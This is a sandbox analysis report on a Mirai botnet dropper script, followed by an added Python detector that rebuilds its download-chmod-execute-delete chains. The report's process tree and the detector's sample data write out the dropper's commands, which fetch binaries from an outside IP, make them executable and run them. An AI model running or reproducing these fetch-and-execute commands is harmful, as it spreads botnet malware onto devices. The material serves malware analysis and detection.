Analysis
- max time kernel: 132s
- max time network: 148s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240611-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 10/03/2025, 22:22
Static task
- static1
Behavioral tasks
- behavioral1: sample wget.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample wget.sh, resource debian9-armhf-20240611-en
- behavioral3: sample wget.sh, resource debian9-mipsbe-20240611-en
- behavioral4: sample wget.sh, resource debian9-mipsel-20240418-en
General
- Target: wget.sh
- Size: 1KB
- MD5: fe3891afe068ca6fc86017361dfb753c
- SHA1: d631b6a4eaa99085df4260727c2c86dc82cf5428
- SHA256: 8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0
- SHA512: 810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951
Malware Config
- Extracted: mirai, BOTNET
- Extracted: mirai, BOTNET
- Extracted: mirai, BOTNET
Signatures
- Mirai family
- File and Directory Permissions Modification (1 TTP, 10 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid | Process
  1524 | busybox
  1539 | busybox
  1549 | busybox
  1566 | busybox
  1519 | busybox
  1529 | busybox
  1534 | busybox
  1544 | busybox
  1554 | busybox
  1559 | busybox
- Executes dropped EXE (9 IoCs)
  ioc | pid | Process
  /tmp/jklarm | 1520 | wget.sh
  /tmp/jklarm5 | 1525 | wget.sh
  /tmp/jklarm6 | 1530 | wget.sh
  /tmp/jklarm7 | 1535 | wget.sh
  /tmp/jklm68k | 1540 | wget.sh
  /tmp/jklmips | 1545 | wget.sh
  /tmp/jklmpsl | 1550 | wget.sh
  /tmp/jklppc | 1555 | wget.sh
  /tmp/jklsh4 | 1560 | wget.sh
- System Network Configuration Discovery (1 TTP, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid | Process
  1543 | busybox
  1545 | jklmips
  1547 | busybox
- Writes file to tmp directory (9 IoCs)
  Malware often drops required files in the /tmp directory.
  description | ioc | Process
  File opened for modification | /tmp/jklm68k | busybox
  File opened for modification | /tmp/jklmips | busybox
  File opened for modification | /tmp/jklmpsl | busybox
  File opened for modification | /tmp/jklarm7 | busybox
  File opened for modification | /tmp/jklppc | busybox
  File opened for modification | /tmp/jklsh4 | busybox
  File opened for modification | /tmp/jklarm | busybox
  File opened for modification | /tmp/jklarm5 | busybox
  File opened for modification | /tmp/jklarm6 | busybox
Processes
depth | PID | image | command line | signatures
1 | 1505 | /tmp/wget.sh | /tmp/wget.sh | Executes dropped EXE
2 | 1506 | /bin/busybox | /bin/busybox wget http://176.65.134.5/jklarm -O jklarm | Writes file to tmp directory
2 | 1519 | /bin/busybox | /bin/busybox chmod +x jklarm | File and Directory Permissions Modification
2 | 1520 | /tmp/jklarm | ./jklarm telnet |
2 | 1522 | /bin/busybox | /bin/busybox rm -rf jklarm |
2 | 1523 | /bin/busybox | /bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm5 | Writes file to tmp directory
2 | 1524 | /bin/busybox | /bin/busybox chmod +x jklarm5 | File and Directory Permissions Modification
2 | 1525 | /tmp/jklarm5 | ./jklarm5 telnet |
2 | 1527 | /bin/busybox | /bin/busybox rm -rf jklarm5 |
2 | 1528 | /bin/busybox | /bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm6 | Writes file to tmp directory
2 | 1529 | /bin/busybox | /bin/busybox chmod +x jklarm6 | File and Directory Permissions Modification
2 | 1530 | /tmp/jklarm6 | ./jklarm6 telnet |
2 | 1532 | /bin/busybox | /bin/busybox rm -rf jklarm6 |
2 | 1533 | /bin/busybox | /bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm7 | Writes file to tmp directory
2 | 1534 | /bin/busybox | /bin/busybox chmod +x jklarm7 | File and Directory Permissions Modification
2 | 1535 | /tmp/jklarm7 | ./jklarm7 telnet |
2 | 1537 | /bin/busybox | /bin/busybox rm -rf jklarm7 |
2 | 1538 | /bin/busybox | /bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k | Writes file to tmp directory
2 | 1539 | /bin/busybox | /bin/busybox chmod +x jklm68k | File and Directory Permissions Modification
2 | 1540 | /tmp/jklm68k | ./jklm68k telnet |
2 | 1542 | /bin/busybox | /bin/busybox rm -rf jklm68k |
2 | 1543 | /bin/busybox | /bin/busybox wget http://176.65.134.5/jklmips -O jklmips | System Network Configuration Discovery; Writes file to tmp directory
2 | 1544 | /bin/busybox | /bin/busybox chmod +x jklmips | File and Directory Permissions Modification
2 | 1545 | /tmp/jklmips | ./jklmips telnet | System Network Configuration Discovery
2 | 1547 | /bin/busybox | /bin/busybox rm -rf jklmips | System Network Configuration Discovery
2 | 1548 | /bin/busybox | /bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl | Writes file to tmp directory
2 | 1549 | /bin/busybox | /bin/busybox chmod +x jklmpsl | File and Directory Permissions Modification
2 | 1550 | /tmp/jklmpsl | ./jklmpsl telnet |
2 | 1552 | /bin/busybox | /bin/busybox rm -rf jklmpsl |
2 | 1553 | /bin/busybox | /bin/busybox wget http://176.65.134.5/jklppc -O jklppc | Writes file to tmp directory
2 | 1554 | /bin/busybox | /bin/busybox chmod +x jklppc | File and Directory Permissions Modification
2 | 1555 | /tmp/jklppc | ./jklppc telnet |
2 | 1557 | /bin/busybox | /bin/busybox rm -rf jklppc |
2 | 1558 | /bin/busybox | /bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh4 | Writes file to tmp directory
2 | 1559 | /bin/busybox | /bin/busybox chmod +x jklsh4 | File and Directory Permissions Modification
2 | 1560 | /tmp/jklsh4 | ./jklsh4 telnet |
2 | 1562 | /bin/busybox | /bin/busybox rm -rf jklsh4 |
2 | 1563 | /bin/busybox | /bin/busybox wget http://176.65.134.5/jklspc -O jklspc |
2 | 1566 | /bin/busybox | /bin/busybox chmod +x jklspc | File and Directory Permissions Modification
2 | 1567 | /tmp/jklspc | ./jklspc telnet |
2 | 1568 | /bin/busybox | /bin/busybox rm -rf jklspc |
2 | 1569 | /bin/busybox | /bin/busybox wget http://176.65.134.5/jklx86 -O jklx86 |
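The process tree above is the whole dropper: for each CPU architecture it fetches a binary from 176.65.134.5 with the BusyBox wget applet, marks it executable with chmod +x, runs it with the single argument telnet, and removes it with rm -rf. The script below is an added example, not part of the tria.ge report or of the sample, that reconstructs those per-artifact chains from (pid, ppid, command line) events and reports which are complete. The events are transcribed from the tree above for four of the artifacts (jklarm, jklmips, jklspc and the truncated jklx86); the parent PIDs are an assumption, since the report shows tree depth rather than ppid. It also generalises slightly beyond the page by treating curl, tftp and ftpget as downloaders alongside wget; only wget appears in this report.

```python
"""Detect Mirai-style multi-architecture dropper chains in a process list.

Added example; not from the tria.ge report or the sample. Events are
(pid, ppid, cmdline); ppid values are assumed (every child here sits
directly under wget.sh, PID 1505, which matches depth 2 in the report).
"""
import os
import shlex
from dataclasses import dataclass, field

DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}  # wget is the only one on the page
STAGES = ("download", "chmod", "exec", "delete")

# Constructed sample input transcribed from the report's process tree.
EVENTS = [
    (1505, 1, "/tmp/wget.sh"),
    (1506, 1505, "/bin/busybox wget http://176.65.134.5/jklarm -O jklarm"),
    (1519, 1505, "/bin/busybox chmod +x jklarm"),
    (1520, 1505, "./jklarm telnet"),
    (1522, 1505, "/bin/busybox rm -rf jklarm"),
    (1543, 1505, "/bin/busybox wget http://176.65.134.5/jklmips -O jklmips"),
    (1544, 1505, "/bin/busybox chmod +x jklmips"),
    (1545, 1505, "./jklmips telnet"),
    (1547, 1505, "/bin/busybox rm -rf jklmips"),
    (1563, 1505, "/bin/busybox wget http://176.65.134.5/jklspc -O jklspc"),
    (1566, 1505, "/bin/busybox chmod +x jklspc"),
    (1567, 1505, "./jklspc telnet"),
    (1568, 1505, "/bin/busybox rm -rf jklspc"),
    (1569, 1505, "/bin/busybox wget http://176.65.134.5/jklx86 -O jklx86"),
]


@dataclass
class DropperChain:
    parent: int
    name: str
    url: str = ""
    exec_args: list = field(default_factory=list)
    pids: dict = field(default_factory=dict)  # stage -> first pid seen

    @property
    def complete(self):
        return all(stage in self.pids for stage in STAGES)


def _argv(cmdline):
    """Split the command line and drop a leading busybox applet wrapper."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes: not something we can classify
        return []
    if len(argv) > 1 and os.path.basename(argv[0]) == "busybox":
        argv = argv[1:]  # "/bin/busybox wget ..." -> "wget ..."
    return argv


def _mode_adds_exec(mode):
    """True for symbolic modes that add x, or octal modes with any x bit set."""
    if mode.isdigit():
        return any(int(d) & 1 for d in mode[-3:])
    return "x" in mode and "-" not in mode


def classify(cmdline):
    """Map one command line to zero or more (stage, name, url, args) tuples."""
    argv = _argv(cmdline)
    if not argv:
        return []
    prog = os.path.basename(argv[0])
    if prog in DOWNLOADERS:
        url = next((a for a in argv[1:] if "://" in a), "")
        out = ""
        if "-O" in argv and argv.index("-O") + 1 < len(argv):
            out = argv[argv.index("-O") + 1]
        elif url:
            out = os.path.basename(url.rstrip("/"))
        return [("download", os.path.basename(out), url, [])] if out else []
    if prog == "chmod" and len(argv) > 2 and _mode_adds_exec(argv[1]):
        return [("chmod", os.path.basename(a), "", []) for a in argv[2:]]
    if prog == "rm":
        return [("delete", os.path.basename(a), "", []) for a in argv[1:] if not a.startswith("-")]
    if argv[0].startswith("./") or argv[0].startswith("/tmp/"):
        return [("exec", prog, "", argv[1:])]  # payload run from cwd or /tmp
    return []


def detect_dropper_chains(events):
    """Group stage events by (parent pid, file name) into DropperChain records."""
    chains = {}
    for pid, ppid, cmdline in events:
        for stage, name, url, args in classify(cmdline):
            chain = chains.setdefault((ppid, name), DropperChain(ppid, name))
            chain.pids.setdefault(stage, pid)
            if url:
                chain.url = url
            if stage == "exec":
                chain.exec_args = args
    return list(chains.values())


def report(chains):
    """One line per chain; complete chains are the download/chmod/exec/delete loop."""
    lines = []
    for c in chains:
        status = "COMPLETE" if c.complete else "partial"
        lines.append(f"{status:8} {c.name:8} url={c.url or '-'} args={c.exec_args} pids={c.pids}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(detect_dropper_chains(EVENTS))))
```

A chain is only reported as complete when all four stages were seen for the same file name under the same parent, which is what separates this loop from a lone wget into /tmp. The jklx86 chain stays partial because the report ends at its wget, and the script's own exec from /tmp shows up as a partial chain too; the exec_args field records the telnet argument the payload is started with.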
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 60KB
  MD5: 35c215d8e2b2ea03a8a191fb3723195a
  SHA1: c38bcfc3d7050edeff1b7dbffd85d07348bb01e9
  SHA256: c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90
  SHA512: ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8
- Filesize: 60KB
  MD5: a04040c769cad786555e183ba8ae0ca0
  SHA1: a89d6b50a8140dddce29595c64949214e65c84f1
  SHA256: 7568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3
  SHA512: e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162
- Filesize: 69KB
  MD5: 9e18604aa4c5bedd6e9ea6690b751880
  SHA1: c1f32fe93aa650f9920fc5bd659d23621ab034a2
  SHA256: 41342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb
  SHA512: cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0
- Filesize: 82KB
  MD5: a9675614a267473cb83e195d9074a067
  SHA1: a4d148cf841fc2b84c8bb3dd322e40f601532875
  SHA256: fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9
  SHA512: 8adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28
- Filesize: 60KB
  MD5: f5fa9a5e6c2a71c86b783b6b5586c3e4
  SHA1: 1a7888806663b58f4bee84472dab0b63adfab8ea
  SHA256: d7ed2bfe303a8e565e6b15e25920d017473b2a7678df3781b6b44840065e2c3d
  SHA512: e13a443311db4a5b4fc3692be4149f534309e24134baf54f508bf56f509aaff7bfab30c1552540030e23270a689cebd7e2ad48e7989687467ada96915d5ae43a
- Filesize: 78KB
  MD5: ce4bd94ea8cbc021bf79e11f1f734c25
  SHA1: f562c88119484f3e92be6e95cb0a435836ca6362
  SHA256: ef931d8ba4966260112b7ed31a1e0b5cd4423becc0397e8eeaee345de903a1ab
  SHA512: d0a85bbbf02f85e445856cced0f7942652ca8c2d748f17a25129b5fa2982df148d5b2580d4c7512d579e4e666ec62700233802a145bbeb38715e77f847f26d29
- Filesize: 79KB
  MD5: 9f79f159a672411a7e5b01f1ed3deb4a
  SHA1: 98584c58a231322ed3e64b96727fe6d935f30aa4
  SHA256: 9cf41e60807702cd85a42ffcabb10f2798193200a381b47f3adbebe65f8360aa
  SHA512: 8486d8dbf427ba9e45b81ae462b64239e7aa33e55603ffa12b8cf7efc80e4b0300e6764fb1c89bc261f910178553b68adc6401fb7de1f6eb36a4f76b5b5b5537
- Filesize: 59KB
  MD5: 2d898ada13cb85e3fc710949c44ade47
  SHA1: db36b96c9531eff756b3d2ee92b632bc4903a179
  SHA256: 00188561e6b9bf60b853e3d752f4131b575a77f48dfdb69f39692e20496f8cdd
  SHA512: e4952241a4ba8a4a83952c28f6396f575ad304ef212bc1897d2790175dfbab0d2c4f1ae2cfca67825ace8eef17c4b4064fde2e31b12ddbe87b6c074f8e9a6b78
- Filesize: 54KB
  MD5: e422f23c58693205126b154196d024d8
  SHA1: efa27cd80e15c1ccada5a5c0de53702097df30ea
  SHA256: b31d22cb1050faa0328fe4f05f03f450bbaccdc4a983d85f058cee4296890280
  SHA512: f0ccb11e75c86ebdc1bf20e7e6a9b6bf452c0c1797fe7d234a2e3b026c5f5b576a983abede5414f2622d89bfc9ba3d4ae0f553beae246aeee7a508792597b681